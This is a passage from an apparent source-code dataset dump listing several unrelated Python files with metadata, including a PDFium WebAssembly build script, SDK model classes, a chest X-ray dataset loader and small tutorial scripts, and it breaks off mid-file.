blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1bb77fc8dacaeb560a91eefb770e6455bfb58186 | add0bb7a309ea346614d7f560a24e653d3d0ff67 | /Python多线程/多线程.py | 141bbbb34bec2b4895f11d7847ae4c8244b89526 | []
| no_license | 1572903465/PythonProjects | 935aff08d5b3d3f146393764a856369061513d36 | 73576080174f72ea1df9b36d201cf3949419041b | refs/heads/master | 2023-06-10T15:50:49.178112 | 2021-07-05T15:42:53 | 2021-07-05T15:42:53 | 301,328,267 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 801 | py | import time
import threading
#GIL是解释器用于同步线程的一种机制
#它使得任何时刻仅有一个线程在执行 (就算你是多核处理器也一样)
#使用GIL的解释器只允许同一时间执行一个线程
#常见的使用GIL的解释器有 CPython 与 Ruby MRI
#如果你用JPython没有GIL锁
#CPU 多线程
def start():#单纯计算 消耗CPU资源 没有实际意义
data = 0
for _ in range(10000000):#连续加
data += 1
return
if __name__ == "__main__":
time_data = time.time()
ts = {}
for i in range(10):
t = threading.Thread(target = start)#target参数填函数名 不要用括号
t.start()
ts[i] = t #全新的线程
for i in range(10):
ts[i].join()
print(time.time() - time_data) | [
"[email protected]"
]
| |
96bdcb9ba0731b60ceb0fa620043c197db1496da | c41432beb80d63d44aead4ae2cb747cafc3316a7 | /modules/wasm.py | 595545ffd82167cfb34979152d1b13f6379d6965 | [
"MIT"
]
| permissive | My6UoT9/pdfium-lib | 58fdbfbecb634ead0c9de430a1677374977525d2 | caf775c56ae0362a0b0cf478e18f607b9242a1e8 | refs/heads/master | 2023-02-26T07:31:36.984428 | 2021-02-02T05:20:27 | 2021-02-02T05:20:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,842 | py | import glob
import os
import tarfile
from subprocess import check_call
import modules.config as c
import modules.functions as f
def run_task_build_pdfium():
f.debug("Building PDFium...")
target = "linux"
build_dir = os.path.join("build", target)
f.create_dir(build_dir)
target_dir = os.path.join(build_dir, "pdfium")
f.remove_dir(target_dir)
cwd = build_dir
command = " ".join(
[
"gclient",
"config",
"--unmanaged",
"https://pdfium.googlesource.com/pdfium.git",
]
)
check_call(command, cwd=cwd, shell=True)
cwd = build_dir
command = " ".join(["gclient", "sync"])
check_call(command, cwd=cwd, shell=True)
cwd = target_dir
command = " ".join(["git", "checkout", c.pdfium_git_commit])
check_call(command, cwd=cwd, shell=True)
def run_task_patch():
f.debug("Patching...")
source_dir = os.path.join("build", "linux", "pdfium")
# build config
source_file = os.path.join(
source_dir,
"build",
"build_config.h",
)
if f.file_line_has_content(
source_file,
201,
"#error Please add support for your architecture in build/build_config.h\n",
):
f.replace_line_in_file(
source_file,
201,
"#define ARCH_CPU_X86_FAMILY 1\n#define ARCH_CPU_32_BITS 1\n#define ARCH_CPU_LITTLE_ENDIAN 1\n",
)
f.debug("Applied: build config")
else:
f.debug("Skipped: build config")
# compiler thin archive
source_file = os.path.join(
source_dir,
"build",
"config",
"BUILDCONFIG.gn",
)
if f.file_line_has_content(
source_file,
342,
' "//build/config/compiler:thin_archive",\n',
):
f.replace_line_in_file(
source_file,
342,
' #"//build/config/compiler:thin_archive",\n',
)
f.debug("Applied: compiler thin archive")
else:
f.debug("Skipped: compiler thin archive")
# build thin archive
source_file = os.path.join(
source_dir,
"BUILD.gn",
)
if f.file_line_has_content(
source_file,
203,
' configs -= [ "//build/config/compiler:thin_archive" ]\n',
):
f.replace_line_in_file(
source_file,
203,
' #configs -= [ "//build/config/compiler:thin_archive" ]\n',
)
f.debug("Applied: build thin archive")
else:
f.debug("Skipped: build thin archive")
# compiler
source_file = os.path.join(
source_dir,
"build",
"config",
"compiler",
"BUILD.gn",
)
if f.file_line_has_content(
source_file,
768,
' "-m64",\n',
):
f.replace_line_in_file(
source_file,
768,
' #"-m64",\n',
)
f.replace_line_in_file(
source_file,
769,
' #"-march=$x64_arch",\n',
)
f.replace_line_in_file(
source_file,
770,
' #"-msse3",\n',
)
f.debug("Applied: compiler")
else:
f.debug("Skipped: compiler")
# pragma optimize
source_file = os.path.join(
source_dir,
"build",
"config",
"compiler",
"BUILD.gn",
)
if f.file_line_has_content(
source_file,
1541,
' "-Wno-ignored-pragma-optimize",\n',
):
f.replace_line_in_file(
source_file,
1541,
' "-Wno-deprecated-register",\n',
)
f.debug("Applied: pragma optimize")
else:
f.debug("Skipped: pragma optimize")
# pubnames
source_file = os.path.join(
source_dir,
"build",
"config",
"compiler",
"BUILD.gn",
)
if f.file_line_has_content(
source_file,
2358,
' cflags += [ "-ggnu-pubnames" ]\n',
):
f.replace_line_in_file(
source_file,
2358,
' #cflags += [ "-ggnu-pubnames" ]\n',
)
f.debug("Applied: pubnames")
else:
f.debug("Skipped: pubnames")
# gcc toolchain
source_file = os.path.join(
source_dir,
"build",
"toolchain",
"gcc_toolchain.gni",
)
if f.file_line_has_content(
source_file,
643,
' cc = "$prefix/clang"\n',
):
f.replace_line_in_file(
source_file,
643,
' cc = "emcc"\n',
)
f.replace_line_in_file(
source_file,
644,
' cxx = "em++"\n',
)
f.debug("Applied: gcc toolchain")
else:
f.debug("Skipped: gcc toolchain")
# partition allocator
source_file = os.path.join(
source_dir,
"third_party",
"base",
"allocator",
"partition_allocator",
"spin_lock.cc",
)
if f.file_line_has_content(
source_file,
54,
'#warning "Processor yield not supported on this architecture."\n',
):
f.replace_line_in_file(
source_file,
54,
'//#warning "Processor yield not supported on this architecture."\n',
)
f.debug("Applied: partition allocator")
else:
f.debug("Skipped: partition allocator")
# compiler stack protector
source_file = os.path.join(
source_dir,
"build",
"config",
"compiler",
"BUILD.gn",
)
if f.file_line_has_content(
source_file,
306,
' cflags += [ "-fstack-protector" ]\n',
):
f.replace_line_in_file(
source_file,
306,
' cflags += [ "-fno-stack-protector" ]\n',
)
f.debug("Applied: compiler stack protector")
else:
f.debug("Skipped: compiler stack protector")
# build pthread
source_file = os.path.join(
source_dir,
"build",
"config",
"BUILD.gn",
)
if f.file_line_has_content(
source_file,
236,
' "pthread",\n',
):
f.replace_line_in_file(
source_file,
236,
' #"pthread",\n',
)
f.debug("Applied: build pthread")
else:
f.debug("Skipped: build pthread")
# compiler pthread
source_file = os.path.join(
source_dir,
"build",
"config",
"compiler",
"BUILD.gn",
)
if f.file_line_has_content(
source_file,
465,
' cflags += [ "-pthread" ]\n',
):
f.replace_line_in_file(
source_file,
465,
' #cflags += [ "-pthread" ]\n',
)
f.debug("Applied: compiler pthread")
else:
f.debug("Skipped: compiler pthread")
# skia pthread
source_file = os.path.join(
source_dir,
"third_party",
"skia",
"gn",
"BUILD.gn",
)
if f.file_line_has_content(
source_file,
231,
' libs += [ "pthread" ]\n',
):
f.replace_line_in_file(
source_file,
231,
' #libs += [ "pthread" ]\n',
)
f.debug("Applied: skia pthread")
else:
f.debug("Skipped: skia pthread")
# copy files required
f.debug("Copying required files...")
linux_dir = os.path.join(source_dir, "linux")
f.create_dir(linux_dir)
f.copy_file("/usr/include/jpeglib.h", os.path.join(source_dir, "jpeglib.h"))
f.copy_file("/usr/include/jmorecfg.h", os.path.join(source_dir, "jmorecfg.h"))
f.copy_file("/usr/include/zlib.h", os.path.join(source_dir, "zlib.h"))
f.copy_file("/usr/include/zconf.h", os.path.join(source_dir, "zconf.h"))
f.copy_file("/usr/include/jerror.h", os.path.join(source_dir, "jerror.h"))
f.copy_file(
"/usr/include/x86_64-linux-gnu/jconfig.h", os.path.join(source_dir, "jconfig.h")
)
f.copy_file("/usr/include/linux/limits.h", os.path.join(linux_dir, "limits.h"))
f.debug("Copied!")
def run_task_build():
f.debug("Building libraries...")
current_dir = os.getcwd()
# configs
for config in c.configurations_wasm:
# targets
for target in c.targets_wasm:
main_dir = os.path.join(
"build",
target["target_os"],
"pdfium",
"out",
"{0}-{1}-{2}".format(target["target_os"], target["target_cpu"], config),
)
f.remove_dir(main_dir)
f.create_dir(main_dir)
os.chdir(
os.path.join(
"build",
target["target_os"],
"pdfium",
)
)
# generating files...
f.debug(
'Generating files to arch "{0}" and configuration "{1}"...'.format(
target["target_cpu"], config
)
)
arg_is_debug = "true" if config == "debug" else "false"
args = []
args.append('target_os="{0}"'.format(target["pdfium_os"]))
args.append('target_cpu="{0}"'.format(target["target_cpu"]))
args.append("use_goma=false")
args.append("is_debug={0}".format(arg_is_debug))
args.append("pdf_use_skia=false")
args.append("pdf_use_skia_paths=false")
args.append("pdf_enable_xfa=false")
args.append("pdf_enable_v8=false")
args.append("is_component_build=false")
args.append("clang_use_chrome_plugins=false")
args.append("pdf_is_standalone=true")
args.append("use_debug_fission=false")
args.append("use_custom_libcxx=false")
args.append("use_sysroot=false")
args.append("use_system_libjpeg=true")
args.append("use_system_zlib=true")
args.append("pdf_is_complete_lib=true")
if config == "release":
args.append("symbol_level=0")
args_str = " ".join(args)
command = " ".join(
[
"gn",
"gen",
"out/{0}-{1}-{2}".format(
target["target_os"], target["target_cpu"], config
),
"--args='{0}'".format(args_str),
]
)
check_call(command, shell=True)
# compiling...
f.debug(
'Compiling to arch "{0}" and configuration "{1}"...'.format(
target["target_cpu"], config
)
)
command = " ".join(
[
"ninja",
"-C",
"out/{0}-{1}-{2}".format(
target["target_os"], target["target_cpu"], config
),
"pdfium",
"-v",
]
)
check_call(command, shell=True)
os.chdir(current_dir)
def run_task_install():
f.debug("Installing libraries...")
# configs
for config in c.configurations_wasm:
for target in c.targets_wasm:
f.remove_dir(
os.path.join("build", target["target_os"], target["target_cpu"], config)
)
f.create_dir(
os.path.join("build", target["target_os"], target["target_cpu"], config)
)
f.create_dir(
os.path.join(
"build", target["target_os"], target["target_cpu"], config, "lib"
)
)
source_lib_path = os.path.join(
"build",
target["target_os"],
"pdfium",
"out",
"{0}-{1}-{2}".format(target["target_os"], target["target_cpu"], config),
"obj",
"libpdfium.a",
)
target_lib_path = os.path.join(
"build",
target["target_os"],
target["target_cpu"],
config,
"lib",
"libpdfium.a",
)
f.copy_file(source_lib_path, target_lib_path)
# check file
f.debug("File data...")
command = " ".join(["file", target_lib_path])
check_call(command, shell=True)
f.debug("File size...")
command = " ".join(["ls", "-lh ", target_lib_path])
check_call(command, shell=True)
# include
include_dir = os.path.join("build", "linux", "pdfium", "public")
target_include_dir = os.path.join(
"build", target["target_os"], target["target_cpu"], config, "include"
)
f.remove_dir(target_include_dir)
f.create_dir(target_include_dir)
for basename in os.listdir(include_dir):
if basename.endswith(".h"):
pathname = os.path.join(include_dir, basename)
if os.path.isfile(pathname):
f.copy_file2(pathname, target_include_dir)
def run_task_test():
f.debug("Testing...")
current_dir = os.getcwd()
sample_dir = os.path.join(current_dir, "sample-wasm")
build_dir = os.path.join(sample_dir, "build")
http_dir = os.path.join("sample-wasm", "build")
for config in c.configurations_wasm:
for target in c.targets_wasm:
lib_file_out = os.path.join(
current_dir,
"build",
target["target_os"],
target["target_cpu"],
config,
"lib",
"libpdfium.a",
)
include_dir = os.path.join(
current_dir,
"build",
target["target_os"],
target["target_cpu"],
config,
"include",
)
f.remove_dir(build_dir)
f.create_dir(build_dir)
# build
command = " ".join(
[
"em++",
"-o",
"build/index.html",
"src/main.cpp",
lib_file_out,
"-I{0}".format(include_dir),
"-s",
"DEMANGLE_SUPPORT=1",
"-s",
"USE_ZLIB=1",
"-s",
"USE_LIBJPEG=1",
"-s",
"WASM=1",
"-s",
"ASSERTIONS=1",
"-s",
"ALLOW_MEMORY_GROWTH=1",
"--embed-file",
"assets/web-assembly.pdf",
]
)
check_call(command, cwd=sample_dir, shell=True)
f.debug(
"Test on browser with: python -m http.server --directory {0}".format(
http_dir
)
)
def run_task_generate():
f.debug("Generating...")
current_dir = os.getcwd()
for config in c.configurations_wasm:
for target in c.targets_wasm:
# paths
utils_dir = os.path.join(current_dir, "extras", "wasm", "utils")
template_dir = os.path.join(current_dir, "extras", "wasm", "template")
relative_dir = os.path.join(
"build",
target["target_os"],
target["target_cpu"],
)
root_dir = os.path.join(current_dir, relative_dir)
main_dir = os.path.join(root_dir, config)
lib_dir = os.path.join(main_dir, "lib")
include_dir = os.path.join(main_dir, "include")
gen_dir = os.path.join(root_dir, "gen")
node_dir = os.path.join(main_dir, "node")
http_dir = os.path.join(relative_dir, config, "node")
f.remove_dir(gen_dir)
f.create_dir(gen_dir)
# doxygen
f.debug("Doxygen...")
doxygen_file = os.path.join(
current_dir,
"extras",
"wasm",
"doxygen",
"Doxyfile",
)
command = " ".join(
[
"doxygen",
doxygen_file,
]
)
check_call(command, cwd=include_dir, shell=True)
# copy xml files
f.debug("Copying xml files...")
xml_dir = os.path.join(include_dir, "xml")
f.copy_dir(xml_dir, os.path.join(gen_dir, "xml"))
f.remove_dir(xml_dir)
# copy utils files
f.debug("Copying utils files...")
f.copy_dir(utils_dir, os.path.join(gen_dir, "utils"))
# prepare files
f.debug("Preparing files...")
rsp_file = os.path.join(gen_dir, "utils", "pdfium.rsp")
f.replace_in_file(rsp_file, "{LIB_DIR}", lib_dir)
f.replace_in_file(rsp_file, "{INCLUDE_DIR}", include_dir)
# node modules
f.debug("Installing node modules...")
gen_utils_dir = os.path.join(
gen_dir,
"utils",
)
command = " ".join(
[
"npm",
"install",
]
)
check_call(command, cwd=gen_utils_dir, shell=True)
# generate
f.debug("Compiling with emscripten...")
gen_out_dir = os.path.join(
gen_dir,
"out",
)
f.remove_dir(gen_out_dir)
f.create_dir(gen_out_dir)
html_file = os.path.join(
gen_out_dir,
"pdfium.html",
)
command = " ".join(
[
"emcc",
"-o",
html_file,
"-s",
'EXPORTED_FUNCTIONS="$(node function-names ../xml/index.xml)"',
"-s",
'EXTRA_EXPORTED_RUNTIME_METHODS=\'["ccall", "cwrap"]\'',
"custom.c",
"@pdfium.rsp",
"-Os",
"--no-entry",
]
)
check_call(command, cwd=gen_utils_dir, shell=True)
# copy files
f.debug("Copying compiled files...")
f.remove_dir(node_dir)
f.copy_dir(gen_out_dir, node_dir)
# copy template files
f.debug("Copying template files...")
f.copy_file(
os.path.join(template_dir, "index.html"),
os.path.join(node_dir, "index.html"),
)
# test
f.debug(
"Test on browser with: python -m http.server --directory {0}".format(
http_dir
)
)
f.debug("Generated")
def run_task_publish():
f.debug("Publishing...")
current_dir = os.getcwd()
publish_dir = os.path.join(current_dir, "build", "linux", "publish")
node_dir = os.path.join(current_dir, "build", "linux", "x64", "release", "node")
template_dir = os.path.join(current_dir, "extras", "wasm", "template")
# copy generated files
f.remove_dir(publish_dir)
f.copy_dir(node_dir, publish_dir)
# copy template files
f.copy_file(
os.path.join(template_dir, "README.md"),
os.path.join(publish_dir, "README.md"),
)
# finish
f.debug("Test on browser with: https://paulo-coutinho.github.io/pdfium-lib/")
f.debug("Published")
def run_task_publish_to_web():
f.debug("Publishing...")
current_dir = os.getcwd()
publish_dir = os.path.join(current_dir, "build", "linux", "publish")
node_dir = os.path.join(current_dir, "build", "linux", "x64", "release", "node")
template_dir = os.path.join(current_dir, "extras", "wasm", "template")
# copy generated files
f.remove_dir(publish_dir)
f.copy_dir(node_dir, publish_dir)
# copy template files
f.copy_file(
os.path.join(template_dir, "README.md"),
os.path.join(publish_dir, "README.md"),
)
# clone gh-pages branch
command = "git init ."
check_call(command, cwd=publish_dir, shell=True)
command = "git add ."
check_call(command, cwd=publish_dir, shell=True)
command = 'git commit -m "new version published"'
check_call(command, cwd=publish_dir, shell=True)
command = 'git push "[email protected]:pdfviewer/pdfviewer.github.io.git" master:master --force'
check_call(command, cwd=publish_dir, shell=True)
# finish
f.debug("Test on browser with: https://pdfviewer.github.io/")
f.debug("Published")
def run_task_archive():
f.debug("Archiving...")
current_dir = os.getcwd()
output_filename = os.path.join(current_dir, "wasm.tgz")
tar = tarfile.open(output_filename, "w:gz")
for config in c.configurations_wasm:
for target in c.targets_wasm:
lib_dir = os.path.join(
current_dir, "build", target["target_os"], target["target_cpu"], config
)
tar.add(
name=lib_dir,
arcname=os.path.basename(lib_dir),
filter=lambda x: (
None if "_" in x.name and not x.name.endswith(".h") else x
),
)
tar.close()
| [
"[email protected]"
]
| |
8a9f2c084e5fbff4425c903743db38ff3e08f6e7 | e7d1e06b5686f87280db292863b34ce0ea530d94 | /src/examples/func_local.py | 151515b33e59143e74c36eb6b6361a128c4ad393 | []
| no_license | tobereborn/byte-of-python2 | 4e9abdb3c513f8b5aa3955873b7468ddb60c8883 | c7e06be6f246dc6292780d59de0806b19c086943 | refs/heads/master | 2021-01-12T04:25:00.536489 | 2017-02-07T02:06:23 | 2017-02-07T02:06:23 | 77,606,492 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 213 | py | #!/usr/bin/python
# -*- coding:utf-8 -*-
'''
Created on Dec 31, 2016
@author: weizhen
'''
def func(x):
print 'Local x is', x
x = 2
print 'Change local x to', x
x = 50
func(x)
print 'x is still', x
| [
"none"
]
| none |
f04925d7a0bf63c4b38d98c0cb08f71f17cc7b9c | 347699fbc16144e45ec9ffb4fbdb01e19cc69329 | /cough2.py | 0187d44d66b5d0a074e7763a7e4e9445b57ae747 | []
| no_license | kevindsteeleii/CS50-Python_Intro_to_CS | e7793f82d0530cd2f22f5b9fae1af0afd9b9ab36 | 6dea7245a27fe540ec9aa2fc878e7b876c4533ef | refs/heads/master | 2020-04-20T14:15:06.223633 | 2019-02-03T00:36:15 | 2019-02-03T00:36:15 | 168,892,517 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 101 | py | # has no special name
def main():
cough()
def cough():
print(3* "cough\n")
main()
# cough() | [
"github email address"
]
| github email address |
5725565c8233d54c532088ebda905dca10d51e65 | 9b64f0f04707a3a18968fd8f8a3ace718cd597bc | /huaweicloud-sdk-servicestage/huaweicloudsdkservicestage/v2/model/create_o_auth_request.py | 6759129234f47c48a4eb8652297aba7bde7df202 | [
"Apache-2.0"
]
| permissive | jaminGH/huaweicloud-sdk-python-v3 | eeecb3fb0f3396a475995df36d17095038615fba | 83ee0e4543c6b74eb0898079c3d8dd1c52c3e16b | refs/heads/master | 2023-06-18T11:49:13.958677 | 2021-07-16T07:57:47 | 2021-07-16T07:57:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,107 | py | # coding: utf-8
import re
import six
class CreateOAuthRequest:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'repo_type': 'str',
'tag': 'str',
'body': 'OAuth'
}
attribute_map = {
'repo_type': 'repo_type',
'tag': 'tag',
'body': 'body'
}
def __init__(self, repo_type=None, tag=None, body=None):
"""CreateOAuthRequest - a model defined in huaweicloud sdk"""
self._repo_type = None
self._tag = None
self._body = None
self.discriminator = None
self.repo_type = repo_type
if tag is not None:
self.tag = tag
if body is not None:
self.body = body
@property
def repo_type(self):
"""Gets the repo_type of this CreateOAuthRequest.
仓库类型。 支持OAuth授权的仓库类型有:github、gitlab、gitee、bitbucket。
:return: The repo_type of this CreateOAuthRequest.
:rtype: str
"""
return self._repo_type
@repo_type.setter
def repo_type(self, repo_type):
"""Sets the repo_type of this CreateOAuthRequest.
仓库类型。 支持OAuth授权的仓库类型有:github、gitlab、gitee、bitbucket。
:param repo_type: The repo_type of this CreateOAuthRequest.
:type: str
"""
self._repo_type = repo_type
@property
def tag(self):
"""Gets the tag of this CreateOAuthRequest.
站点标签。 比如国际站的,?tag=intl。 默认为空。
:return: The tag of this CreateOAuthRequest.
:rtype: str
"""
return self._tag
@tag.setter
def tag(self, tag):
"""Sets the tag of this CreateOAuthRequest.
站点标签。 比如国际站的,?tag=intl。 默认为空。
:param tag: The tag of this CreateOAuthRequest.
:type: str
"""
self._tag = tag
@property
def body(self):
"""Gets the body of this CreateOAuthRequest.
:return: The body of this CreateOAuthRequest.
:rtype: OAuth
"""
return self._body
@body.setter
def body(self, body):
"""Sets the body of this CreateOAuthRequest.
:param body: The body of this CreateOAuthRequest.
:type: OAuth
"""
self._body = body
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
import simplejson as json
return json.dumps(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, CreateOAuthRequest):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"[email protected]"
]
| |
e216c2feeb68eba1c8976b72040c3a84d2b3c578 | e2ba1e3d001902e50f1dc9a63baf2a8abcac3ed8 | /InnerEye-DataQuality/InnerEyeDataQuality/datasets/nih_cxr.py | 91776355375965f599295af3453238326df7cff1 | [
"MIT",
"LicenseRef-scancode-generic-cla"
]
| permissive | RobinMarshall55/InnerEye-DeepLearning | 81f52e7429f942e8c9845958d5b586e19e14e351 | 8495a2eec3903957e3e81f81a0d2ad842d41dfe2 | refs/heads/main | 2023-08-15T19:46:38.017713 | 2021-10-22T14:13:56 | 2021-10-22T14:13:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,929 | py | # ------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License (MIT). See LICENSE in the repo root for license information.
# ------------------------------------------------------------------------------------------
import logging
from pathlib import Path
from typing import Callable, List, Optional, Tuple, Dict, Union
import PIL
from PIL import Image
from torch.utils.data import Dataset
import numpy as np
import pandas as pd
NIH_TOTAL_SIZE = 112120
class NIHCXR(Dataset):
def __init__(self,
data_directory: str,
use_training_split: bool,
seed: int = 1234,
shuffle: bool = True,
transform: Optional[Callable] = None,
num_samples: int = None,
return_index: bool = True) -> None:
"""
Class for the full NIH ChestXray Dataset (112k images)
:param data_directory: the directory containing all training images from the dataset as well as the
Data_Entry_2017.csv file containing the dataset labels.
:param use_training_split: whether to return the training or the test split of the dataset.
:param seed: random seed to use for dataset creation
:param shuffle: whether to shuffle the dataset prior to spliting between validation and training
:param transform: a preprocessing function that takes a PIL image as input and returns a tensor
:param num_samples: number of the samples to return (has to been smaller than the dataset split)
"""
self.data_directory = Path(data_directory)
if not self.data_directory.exists():
logging.error(
f"The data directory {self.data_directory} does not exist. Make sure to download the NIH data "
f"first.The dataset can on the main page"
"https://www.kaggle.com/nih-chest-xrays/data. Make sure all images are placed directly under the "
"data_directory folder. Make sure you downloaded the Data_Entry_2017.csv file to this directory as"
"well.")
self.train = use_training_split
self.seed = seed
self.random_state = np.random.RandomState(seed)
self.dataset_dataframe = pd.read_csv(self.data_directory / "Data_Entry_2017.csv")
self.dataset_dataframe["pneumonia_like"] = self.dataset_dataframe["Finding Labels"].apply(
lambda x: x.split("|")).apply(lambda x: "pneumonia" in x.lower()
or "infiltration" in x.lower()
or "consolidation" in x.lower())
self.transforms = transform
orig_labels = self.dataset_dataframe.pneumonia_like.values.astype(np.int64)
subjects_ids = self.dataset_dataframe["Image Index"].values
is_train_ids = self.dataset_dataframe["train"].values
self.num_classes = 2
self.indices = np.where(is_train_ids)[0] if use_training_split else np.where(~is_train_ids)[0]
self.indices = self.random_state.permutation(self.indices) \
if shuffle else self.indices
# ------------- Select subset of current split ------------- #
if num_samples is not None:
assert 0 < num_samples <= len(self.indices)
self.indices = self.indices[:num_samples]
self.subject_ids = subjects_ids[self.indices]
self.orig_labels = orig_labels[self.indices].reshape(-1)
self.targets = self.orig_labels
# Identify case ids for ambiguous and clear label noise cases
self.ambiguity_metric_args: Dict = dict()
dataset_type = "TRAIN" if use_training_split else "VAL"
logging.info(f"Proportion of positive labels - {dataset_type}: {np.mean(self.targets)}")
logging.info(f"Number samples - {dataset_type}: {self.targets.shape[0]}")
self.return_index = return_index
def __getitem__(self, index: int) -> Union[Tuple[int, PIL.Image.Image, int], Tuple[PIL.Image.Image, int]]:
"""
:param index: The index of the sample to be fetched
:return: The image and label tensors
"""
subject_id = self.subject_ids[index]
filename = self.data_directory / f"{subject_id}"
target = self.targets[index]
scan_image = Image.open(filename).convert("L")
if self.transforms is not None:
scan_image = self.transforms(scan_image)
if self.return_index:
return index, scan_image, int(target)
return scan_image, int(target)
def __len__(self) -> int:
"""
:return: The size of the dataset
"""
return len(self.indices)
def get_label_names(self) -> List[str]:
return ["NotPneunomiaLike", "PneunomiaLike"]
| [
"[email protected]"
]
| |
a9adbd9757605899cfcc24ab62f85a0506576082 | 9923e30eb99716bfc179ba2bb789dcddc28f45e6 | /apimatic/python_generic_lib/Samsara+API-Python/samsaraapi/models/tag_1.py | c430f1f458ea4d2ca686481440b43d895aaab5a2 | [
"MIT"
]
| permissive | silverspace/samsara-sdks | cefcd61458ed3c3753ac5e6bf767229dd8df9485 | c054b91e488ab4266f3b3874e9b8e1c9e2d4d5fa | refs/heads/master | 2020-04-25T13:16:59.137551 | 2019-03-01T05:49:05 | 2019-03-01T05:49:05 | 172,804,041 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,770 | py | # -*- coding: utf-8 -*-
"""
samsaraapi
This file was automatically generated by APIMATIC v2.0 ( https://apimatic.io ).
"""
class Tag1(object):
"""Implementation of the 'Tag1' model.
TODO: type model description here.
Attributes:
id (long|int): The ID of this tag.
name (string): Name of this tag.
parent_tag_id (long|int): The ID of this tag.
"""
# Create a mapping from Model property names to API property names
_names = {
"id":'id',
"name":'name',
"parent_tag_id":'parentTagId'
}
def __init__(self,
id=None,
name=None,
parent_tag_id=None):
"""Constructor for the Tag1 class"""
# Initialize members of the class
self.id = id
self.name = name
self.parent_tag_id = parent_tag_id
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
id = dictionary.get('id')
name = dictionary.get('name')
parent_tag_id = dictionary.get('parentTagId')
# Return an object of this model
return cls(id,
name,
parent_tag_id)
| [
"[email protected]"
]
| |
d5a7791ef5d1a16c2f4cfdbc78846c44437f2ad5 | 33327721233dbab4f95226aca5ebf52ec5782ae3 | /ModelInheritance/urls.py | 184bf47cbd9fed6d95c6e1cf7d0f6a88f774f9c9 | []
| no_license | priyankaonly1/ModelInheritance | 0b45e515cb1f9751f76b9639d1aab78369a861f9 | 078dfd24428c8f64ab66da421a1e4afc94b5c14c | refs/heads/main | 2023-07-05T11:55:17.489648 | 2021-09-03T18:56:22 | 2021-09-03T18:56:22 | 402,871,149 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 809 | py | """ModelInheritance URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from school import views
urlpatterns = [
path('admin/', admin.site.urls),
path('', views.home),
]
| [
"[email protected]"
]
| |
22e0f4ddf70d8a6df31ef25ad3c9523dd8105a3a | ac89e5d51d0d15ffdecfde25985c28a2af9c2e43 | /test/test_match_alliance.py | 931bc1a9d817c762a45d35d742fc1774fbbb67f5 | []
| no_license | TBA-API/tba-api-client-python | 20dc4a634be32926054ffc4c52b94027ee40ac7d | 4f6ded8fb4bf8f7896891a9aa778ce15a2ef720b | refs/heads/master | 2021-07-15T16:36:32.234217 | 2020-05-07T00:20:43 | 2020-05-07T00:20:43 | 134,112,743 | 4 | 8 | null | 2019-07-01T03:14:12 | 2018-05-20T02:13:45 | Python | UTF-8 | Python | false | false | 1,191 | py | # coding: utf-8
"""
The Blue Alliance API v3
# Overview Information and statistics about FIRST Robotics Competition teams and events. # Authentication All endpoints require an Auth Key to be passed in the header `X-TBA-Auth-Key`. If you do not have an auth key yet, you can obtain one from your [Account Page](/account). A `User-Agent` header may need to be set to prevent a 403 Unauthorized error. # noqa: E501
The version of the OpenAPI document: 3.04.1
Generated by: https://openapi-generator.tech
